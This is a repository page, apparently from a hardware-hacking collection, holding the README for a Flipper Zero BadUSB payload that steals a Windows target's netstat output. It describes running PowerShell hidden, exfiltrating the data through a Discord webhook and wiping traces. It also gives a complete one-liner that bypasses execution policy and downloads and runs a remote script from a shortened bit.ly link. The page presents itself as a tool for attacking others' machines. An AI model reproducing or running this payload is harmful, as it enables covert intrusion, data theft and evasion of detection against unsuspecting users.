Hardware-Hacking/my-flipper-shits
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
hello
my-flipper-shits/Windows/Exfiltration/Netstat_Windows
T
History
Aleff 9bcd0cf43d hello
2025-07-04 07:09:11 +00:00
..
payload.txt
hello
2025-07-04 07:09:11 +00:00
README.md
hello
2025-07-04 07:09:11 +00:00
Windows-netstat.ps1
hello
2025-07-04 07:09:11 +00:00

README.md

Windows netstat - BadUSB

A script used to stole target netstat status.

Hits

Category: Exfiltration


Description

This script will stole target netstat status.

Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.

Then it cleans up traces of what you have done after.

Getting Started

Dependencies

  • An internet connection
  • Windows 10,11

Executing program

  • Plug in your device
  • Invoke the indicated commands
  • Invoke-WebRequest will be entered in the Run Box to send the content

Settings

Put 1 on the function that you want to active, else 0. Functions available:

  • default (or simple 'netstat' command)
  • routing_table $r
  • listening_canonical $lc
  • listening_numerical $ln
  • all_canonical $ac
  • all_numerical $an
  • offload ot
  • proto $p "<protocol>"
    • In this option you must put the protocol that you want to monitor, for example $proto="TCP" if you want to monitor TCP, else leave blank, so $proto="".
powershell -w h -ep bypass $discord='';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm bit.ly/WindowsNetstatScript1 | iex

You must put your Discord webhook into the variable $discord='<your-webhook-here>'

Credits

Aleff :octocat:


Github
Linkedin
Reference in New Issue View Git Blame Copy Permalink